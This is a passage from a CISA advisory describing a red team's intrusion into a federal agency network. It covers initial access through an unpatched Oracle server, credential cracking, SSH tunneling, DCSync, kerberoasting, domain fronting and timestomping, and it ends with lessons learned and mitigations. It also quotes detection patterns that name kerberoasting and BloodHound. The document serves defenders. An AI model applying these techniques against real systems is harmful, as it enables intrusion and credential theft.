actors abuse command and script interpreters to execute commands, scripts, or binaries. Table 8. Defense Evasion Technique Title ID Use Obfuscated Files or Information T1027 The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit. Table 9. Credential Access Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Table 10. Discovery and Lateral Movement Technique Title ID Use Remote Services T1021 The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. Remote Services: SMB/Windows Admin Shares T1021.002 The actors use valid accounts to interact with a remote network share using Server Message Block (SMB). File and Directory Discovery T1083 The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Account Discovery T1087 The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. Table 11. Command and Control Technique Title ID Use Application Layer Protocol T1071 The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus. Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. Table 12. Collection and Exfiltration Technique Title ID Use Data from Network Shared Drive T1039 The actors search network shares on computers they have compromised to find files of interest. Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server. Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration. Exfiltration Over Web Service T1567 The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

EXECUTIVE SUMMARY In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture. During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase. The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs. The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise. The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk: Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity. Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs. Lesson learned: Bureaucratic processes and decentralized teams hindered the organization’s network defenders. Lesson learned: A “known-bad” detection approach hampered detection of alternate TTPs. To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below: Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions. Use robust network segmentation to impede lateral movement across the network. Establish baselines of network traffic, application execution, and account authentication. Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric. CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise: Eliminate default passwords. Provide logging at no additional charge. Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. Download the PDF version of this report: AA24-193A CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth (PDF, 1.18 MB ) INTRODUCTION CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase: Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team’s goal was to compromise the assessed organization’s domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention. CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach. Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization’s cyber defensive capabilities. During this phase, the team: Proposed new behavior-based and tool-agnostic detections to uncover additional tradecraft used during the Adversary Emulation Phase. They also evaluated the organization’s improvements according to current CISA priorities and public guidance. Troubleshot existing detection steps to show how certain TTPs evaded IOC-based detections. Deconflicted events from CISA red team activity, indicating unexpected network/application behavior or the potential presence of a real adversary in the network.Note: The team’s goal during this phase was to build the organization’s ability to detect malicious activity based on adversary behavior (i.e., TTPs) vice relying on known IOCs. This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.  During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs. Figure 1: SILENTSHIELD assessment timeline Adversary Emulation Phase Exploitation of the Solaris Enclave Reconnaissance, Initial Access, and Command and Control CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access. The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001]. Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023. Credential Access, Command and Control, and Privilege Escalation Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password. Figure 2: Exploitation of the Solaris Enclave The team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section). Lateral Movement and Persistence Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004]. Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints. These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports.  The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3). Figure 3: Example of Lateral Movement in the Solaris Enclave Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders. To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated. Full Enclave Compromise Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007]. The harvested password granted unrestricted privileged access to the entire Solaris enclave. Exploitation of the Windows Domain While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4). Figure 4: Exploitation of Solaris enclave The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials. Reconnaissance and Initial Access While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation. The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon. Credentialed Access and Privilege Escalation Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM). Lateral Movement and Persistence The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001]. The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004]. The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism. The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts.  The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5). Figure 5: Exploitation of the Windows Domain After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior. Pivoting Into External Trusted Partners The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally. The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6). figure 6: path of exploitation into external fceb organizations These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors. Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions. Defense Evasion Techniques Solaris Enclave Figure 5: Exploitation of the Windows Domain Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run—full file path and any command line arguments are not recorded. For example: A real file: /opt/splunkforwarder/bin/splunkd A malicious copy: /opt/splunkforwarder/splunkd Command auditing logs: splunkd The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment. Windows Domain The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027]. Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised. To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities. All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection. Collaborative Phase Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity. During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise: EDR alerts; YARA scans; C2 domains and techniques; Internal pivot hosts; Admin accounts used to pivot; Memory dumps, revealing attempts to pass credentials; and Email logs documenting the initial breach via phishing. Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps: Command execution (initial access and lateral movement); Establish C2 channels and exfiltrate data; Establish persistence; Escalate privileges; and Use and abuse credentials. All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs. Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations. Log Collection The assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage. The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses. Forensic Analysis Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses. Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders—using either the native touch -r command or implants’ timestomp command to disguise the last-modified timestamp captured in the output of ls –la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation. Reliance on Known IOCs The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example: After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team’s loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks. Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team’s kerberoasting activity. Regular Monitoring and Investigation Management Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example: While EDR products detected and quarantined several of the red team’s tools, including the initial phishing payload, the organization’s daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders’ daily workflows. This allowed SOC personnel to identify new attempts at lateral movement. Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled. The organization’s technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology. Network defenders had poor operational security and alerted the red team of investigations. For example: In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed. The red team observed system administrators reviewing forensic artifacts tied to the team’s Solaris payload—searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation. IT teams were siloed from the SOC, who had no knowledge of the system administrator’s weeks long investigation into the anomalous network behavior. While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments. Sysmon Misconfigurations The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations: Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:\Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads. Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events). Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:\Program Files (x86)\Google\Update\*). LESSONS LEARNED AND KEY FINDINGS The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings. Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity. Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization’s hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports. Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domain. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response. Finding #3: The organization had trust relationships with multiple partner organizations, which—when combined with weak credentials and network connectivity—allowed the red team to exploit and move laterally to a partner domain controller. This highlights the risk of blindly allowing third party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material. Finding #4: The organization’s defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation. Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques nor were any alerts on anomalous behavior being monitored. Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation. Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs. Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation. Finding #8: Network defenders’ daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided a 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team’s activity. Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering. Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization’s network defenders. Finding #10: The organization’s technical staff were spread across decentralized teams. Siloed team structure meant that IT, security, and other technical teams lacked consistency with their tools, creating too much noise for defenders to sift through. Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering timeliness and maintenance of a defensive posture. Finding #12: The organization’s forensics team produced an incident response report which documented the red team’s initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team’s ability to expand and persist. The success of the red team’s first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts and, by extension, the Windows environment. Moreover, the organization’s internal report only focused on vulnerable servers and did not account for a cyber threat actor’s ability to expand and persist in the Solaris enclave. The Solaris administrator’s investigations of the red team failed to appear in either the report or in SOC deconflictions. An admin’s inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement. Lesson Learned: A “known-bad” detection approach hampered detection of alternate TTPs. Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization’s network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools, but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new “threat actor” with new TTPs sidestepped nearly all detections. Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions. Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, CISA red team, or adversaries. This also created excessive noise for defenders to effectively sift through to determine expected versus anomalous activity. Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allow-listing. NOTED STRENGTHS The assessed organization promptly planned for and resolved multiple identified issues, including with: Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary. There is an on-going effort to change service account passwords and apply DoD recommended STIG compliance (over 85 percent have been changed since the publication of this report). IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity-based monitoring capabilities in front of tier zero assets. Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet. Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers of to identify anomalous instances. Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations. Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts. MITIGATIONS Network Defenders CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Table 1: Recommendations to Mitigate Identified Issues Finding Recommendation Inadequate firewall between perimeter and internal devices Deploy internal and external network firewalls to inspect, log, and/or block unknown or unauthorized traffic. Perform deep packet inspection to detect mismatched application traffic or encrypted data flows. Restrict outbound internet egress to hosts whenever possible. Establish a baseline of normal user activity, including unique IPs or domains. Insufficient Network Segmentation Apply the principle of least privilege to limit the exposure of systems and services in the demilitarized zone (DMZ). Segment the DMZ based on the sensitivity of systems and services as well as the internal network [CPG 2.F]. Segment networks to protect assets and workstations from direct exposure to the internet by considering the criticality of the asset to business functions, sensitivity of the data traversing the asset, and requirements for internet access to the asset. Implement and regularly test firewalls, access control lists, and intrusion prevention systems. Take advantage of opportunities to create natural network segmentation. Securely configured VPNs used for remote laptops, for instance, create an easy place to filter and monitor incoming traffic. Trust relationships between domains were overly permissive Restrict network connectivity (ingress and egress) to only necessary services between trusted domains [CPG 2.E]. Regularly monitor privileged access via Foreign Security Principals (FSPs). Defensive activity was not sufficiently isolated Perform network defense investigations out-of-band [CPG 3.A]. Conduct regular security audits and penetration testing by internal and external parties. Develop and implement a comprehensive Incident Response Plan (IRP) and conduct regular drills and simulations [CPG 2.S]. IDM solutions were not fully understood and utilized Enroll all accounts in IDM solutions and test against common credential manipulation techniques. Integrate the IDM solution with other systems and applications, allowing for the streamlining of workflows. Insufficient role-based host segmentation Establish Role-Based Access Controls (RBAC) to systematically assign permissions based on job functions [CPG 2.E]. Implement a comprehensive security model incorporating micro-segmentation at the host level. Failure to monitor EDR alerts daily Develop and document Standard Operating Procedures (SOPs) for handling EDR alerts [CPG 5.A]. Establish and maintain incident response playbooks. Conduct regular audits and reviews of the EDR alert handling process. Host artifacts were overly trusted Operationalize and deploy File Integrity Monitoring (FIM) solutions. Regularly review and adjust access permissions, adhering to the principle of least privilege [CPG 2.E]. Establish proper forensic processes to ensure integrity. Bureaucracy and decentralization of network defenders hampered communication and consistency Introduce cross-training initiatives to cultivate a collaborative culture. Encourage the establishment of cross-functional projects. Utilize collaboration platforms that seamlessly integrate various tools and systems. Insufficient internal incident response report  Promote a culture of ongoing improvement while also fostering a proactive approach among employees to promptly report suspicious activities. Treat suspected incidents of compromise as a confirmed breach, and account for a threat actor’s ability to move laterally when defining the scope of incident response efforts. Focus on known/common IOCs Employ centralized logging and tool-agnostic detection methods. Leverage threat intelligence feeds by integrating them into a SIEM tool. Implement regular updates for IOCs and TTPs, with the capability for customization to address the specific threat landscape [CPG 3.A]. Detection rules were visible from compromised systems Integrate runtime detection mechanisms while removing world-readable configuration files from installer deployments where applicable. Insufficient restriction of admin tools Enhance security posture by implementing application allowlisting to ensure only trusted and 